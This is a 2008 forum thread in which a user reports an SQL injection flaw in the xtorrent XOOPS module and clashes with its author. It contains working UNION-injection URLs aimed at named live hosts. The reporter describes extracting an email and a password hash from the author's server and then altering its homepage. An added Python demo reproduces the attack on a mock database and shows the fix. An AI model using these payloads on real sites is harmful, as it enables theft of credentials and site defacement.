1
Anonymous
Multiple SQL injection exploit in xtorrent module
  • 2008/3/11 18:28

  • Anonymous

  • Posts: 0

  • Since:


Despite being called and belittled by xtorrent author wishcraft, and his statement that I am being paranoid and don't know what I'm talking about:

The Xtorrent module is vulnerable to SQL injection.

And yes, I do know what $_GET and $HTTP_GET_VARS are. Long variables are deprecated, btw ;)

viewcat.php is vulnerable to injection because input is not correctly sanitized.

I'm not a drama queen like wishcraft.

You try to offer advice and you get met with hostility. Why should anyone bother reporting security vulnerabilities instead of just hacking you all the time?

Proof of concept:

http://www.domain.com/modules/xtorrent/viewcat.php?cid=999%20un_ion%20select%20uname,null,null,null,null,null%20from%20xoops_users%20where%20uid=1


The above will display the username of uid=1 when you type it into the address bar, by injecting SQL into viewcat.

The mere fact that you get a result means the module is vulnerable. The username is not the only thing that can be grabbed; password hashes or anything from any table can easily be retrieved by crafting a URL similar to the above, or even more so when using concat().

Now wishcraft, please tell me I'm being paranoid.

PS. Remove the _ underscore from un_ion.

Also, that is just one exploit; there are more files and more $variables etc. that can be exploited in the module.
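As an added illustration of the report above (example code written for this page, not the xtorrent module's source), the following Python script models viewcat.php's handling of the cid parameter with an in-memory SQLite database: a vulnerable handler that splices the raw parameter into the statement, and a fixed handler that coerces it to an integer and binds it. The schema, the sample rows, the table names and the "admin" user are constructed assumptions, chosen so the six-NULL UNION payload quoted in the post lines up; the payload is the one from the post, with the underscore removed from "union". SQLite stands in for MySQL; the UNION mechanics are the same for this payload.

```python
"""Added example modelling the viewcat.php?cid= injection described above.

Not the xtorrent module's code: the schema, sample rows and handler functions
are constructed for this illustration. SQLite stands in for MySQL.
"""
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# The payload quoted in the post, with the underscore removed from 'union'.
PAYLOAD_URL = (
    "http://www.domain.com/modules/xtorrent/viewcat.php?cid=999"
    "%20union%20select%20uname,null,null,null,null,null"
    "%20from%20xoops_users%20where%20uid=1"
)


def make_db():
    """In-memory database with constructed sample rows.

    The category table has six columns so that the six-column UNION in the
    payload lines up; that width is an assumption, not the module's schema.
    """
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE xoops_xtorrent_cat (
            cid INTEGER, title TEXT, description TEXT,
            imgurl TEXT, pid INTEGER, weight INTEGER);
        INSERT INTO xoops_xtorrent_cat VALUES
            (1, 'Linux ISOs', 'Distribution images', '', 0, 0);
        CREATE TABLE xoops_users (uid INTEGER, uname TEXT, pass TEXT, email TEXT);
        INSERT INTO xoops_users VALUES
            (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99', 'admin@example.invalid');
        """
    )
    return db


def cid_from_url(url):
    """What $_GET['cid'] would hold: the URL-decoded value, untouched."""
    return parse_qs(urlsplit(url).query)["cid"][0]


def viewcat_vulnerable(db, cid):
    """Splices the raw parameter into the statement (the reported bug).

    With the payload, the WHERE clause matches nothing and the UNION half
    returns a row from xoops_users instead: the 'result' the post talks about.
    """
    sql = "SELECT * FROM xoops_xtorrent_cat WHERE cid=" + cid
    return db.execute(sql).fetchall()


def intval(value):
    """Approximates PHP's intval() on a string: leading integer, else 0."""
    m = re.match(r"\s*([+-]?\d+)", value)
    return int(m.group(1)) if m else 0


def viewcat_fixed(db, cid):
    """Coerces to int and binds the value; the attacker's text never reaches SQL."""
    sql = "SELECT * FROM xoops_xtorrent_cat WHERE cid=?"
    return db.execute(sql, (intval(cid),)).fetchall()


def demo():
    """Runs both handlers against the quoted payload and returns the results."""
    db = make_db()
    cid = cid_from_url(PAYLOAD_URL)
    return {
        "cid": cid,
        "vulnerable": viewcat_vulnerable(db, cid),
        "fixed": viewcat_fixed(db, cid),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The two defences in viewcat_fixed are independent: casting alone would already defeat this payload (intval stops at "999"), and binding alone would too, since the whole string is then compared as a value rather than parsed as SQL. Using both means a later change to one does not silently reopen the hole.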

2
wishcraft
Re: Multiple SQL injection exploit in xtorrent module

Well Vaughan from ImpressCMS, if that is even your real name... I don't know, I have been reading reports that someone is trying to funnel even my donation to Xoops.org from xoops... That's why I am friends with xoops.

Well, I tried your vulnerability and several others and all they seem to produce is a blank page on the CMS...

Hey everyone, try it on my development server:

http://www.unseen.org.au/modules/xtorrent/viewcat.php?cid=1%20un_ion%20select%20uname,null,null,null,null,null%20from%20xoops_users%20where%20uid=1


Wouldn't you, if you are from ImpressCMS like your email states, already have a username on xoops? Or be one of the banned people.

All it seems to do is produce a blank result. It doesn't display anything?

You're a script kiddy, congratulations. I have been programming for 20 years, more or less in the compilers, not scripting languages like PHP. And SQL injection is something that exists in most libraries; somehow the other side of the system will counter for it, like the need for a smarty variable to display the data or a textbox... If this doesn't exist then it's not a problem.

If you want to get involved with the x-torrent project then do so -- make an application at http://www.sourceforge.org/project/x-Torrent/ but otherwise, don't contact me again. Thanks, Vaughan.


Btw, you still haven't answered my question: if this was such a problem, why do people do URL paths like this:

http://www.bankfees.net.au/forums/Credit_Unions/Credit_Unions/

or

http://www.bankfees.net.au/forums/Credit_Unions

and so on.
http://www.ohloh.net/accounts/226400

Follow, Like & Read:-

twitter.com/RegaltyFamily
github.com/Chronolabs-Cooperative
facebook.com/DrAntonyRoberts

3
Anonymous
Re: Multiple SQL injection exploit in xtorrent module
  • 2008/3/11 21:50

  • Anonymous

  • Posts: 0

  • Since:


First off, let's give you a bit of a lesson.

It's a general SQL query.

Change xoops_users to match your db prefix, i.e. ergherhg_users.

Secondly, if you have Protector installed, then disable it to check, otherwise Protector will ban you.

I thought you were an expert.

And please don't say "well, Protector will protect you". Trusting that people have Protector installed is not an excuse to not fix unsanitized code.

And before you say again that if a hacker doesn't know your db prefix then it won't work: I can easily craft a union query from the above in order to produce an error which will give me the prefix of your tables.

And yes, I am Vaughan. And yes, my name is Vaughan Montgomery, hence m0nty.

My other accounts 'vaughan' and 'm0nty' are banned from posting on here at my own personal request!! But I thought I'd re-register here in order to prove a point to you.

Script kiddie? Aren't we all script kiddies... even though I'm 33 years old.

Quote:

Btw, you still haven't answered my question: if this was such a problem, why do people do URL paths like this:

http://www.bankfees.net.au/forums/Credit_Unions/Credit_Unions/

or

http://www.bankfees.net.au/forums/Credit_Unions

and so on.


Why? Because it's better for SEO and it's also easier on the eyes and memory, but it has nothing to do with preventing SQL injection.

4
wishcraft
Re: Multiple SQL injection exploit in xtorrent module

Sorry Vaughan, I am going to have to do you in the full monty here.

http://www.unseen.org.au/modules/xtorrent/viewcat.php?cid=1%20un_ion%20select%20uname,null,null,null,null,null%20from%20_unseen2_users%20where%20uid=1


Doesn't do a thing on the server, just displays this:

[screenshot of the blank page]

Absolutely nothing. I tried your example with the other files in the system and still absolutely nothing that was critical.

Mind you Vaughan, I am not saying I am not going to fix the example you have put up, but I am not going to do it immediately; I have some changes to make to the system anyway.

I tell you what: if you can do a hack through the URL that removes the image showing how your example just displays a blank page that does nothing, then I will find that amusing.

5
wishcraft
Re: Multiple SQL injection exploit in xtorrent module

Quote:

Quote:

Btw, you still haven't answered my question: if this was such a problem, why do people do URL paths like this:

http://www.bankfees.net.au/forums/Credit_Unions/Credit_Unions/

or

http://www.bankfees.net.au/forums/Credit_Unions

and so on.


Why? Because it's better for SEO and it's also easier on the eyes and memory, but it has nothing to do with preventing SQL injection.


But Vaughan, you see, the SQL injection problem happens again like this:
http://www.bankfees.net.au/forums/Credit_Unions"%20union%20select%20uname,null,null,null,null,null%20from%20xoops_users%20where%20uid=1/

Luckily I SEF it before parsing it so it doesn't do anything; perhaps you should stick to something that does the programming for you, Monty, like Ruby on Rails or something.

6
Anonymous
Re: Multiple SQL injection exploit in xtorrent module
  • 2008/3/11 22:29

  • Anonymous

  • Posts: 0

  • Since:


Is uid=1 called cej?

I'm just tinkering and haven't used any concat or anything...

But I retrieve an md5 hash of '******************'

Email address > *************

Edited by Vaughan > removed hash and email as the demo is over.

http://www.unseen.org.au/modules/xtorrent/viewcat.php?cid=999%20un_ion%20select%20email,null,null,null,null,null%20from%20_unseen2_users%20where%20uid=1



And remember to remove the _ underscore from union. (I add the _ here on the forums so Protector doesn't ban me.)

[screenshot]

7
wishcraft
Re: Multiple SQL injection exploit in xtorrent module

Yeah, but I still want to see you remove the image that shows that it is blank!! That's a hack... Retrieving some details isn't really a hack; besides, I don't run Protector on that system.

Alright Vaughan, just for you, don't you feel special, I will fix it, but after my day's work is finished.

But you still haven't answered my question about the domain path; it had nothing to do with SEO, that is just the interim.

So I will ask it again:

If SQL injection was such a problem, why do people make domains like the ones you can see on bankfees.net.au?

They are dynamic and there is no reprogramming of the .htaccess file to make them work. It is all dynamic to the user content.

8
Anonymous
Re: Multiple SQL injection exploit in xtorrent module
  • 2008/3/11 23:05

  • Anonymous

  • Posts: 0

  • Since:


Why? Who cares. The point in question is that the xtorrent module has a security issue.

What can be done with an md5 hash? Rainbow keys, anyone?

Or construct a new query which will update table xoops_users and set pass='**********' where uid=1, injected into the URL.

Or use XSS and construct a script which will just grab your cookie details and allow you to log in that way. Really, there are numerous possibilities, from manipulating tables, deleting them, even closing down the MySQL server or executing shell commands.

Really, you need to understand SQL injection a lot more. I'm not going to do it to you, but I am making sure that you realise what can potentially be done!!!

9
wishcraft
Re: Multiple SQL injection exploit in xtorrent module

OK Vaughan, just for you I fixed it this morning, before work starts.

The new checksums for x-torrent 1.30Rc are:

md5: 537bcdc64a6c397d52b35ad2b7d3281c

crc32: 5b763615

10
Anonymous
Re: Multiple SQL injection exploit in xtorrent module
  • 2008/3/11 23:26

  • Anonymous

  • Posts: 0

  • Since:


Don't do it for me, do it for your users; they're the ones that need to feel secure.

Btw, check the homepage of your dev site.

That's how easy it is once I retrieved the db hash etc.

[screenshot]
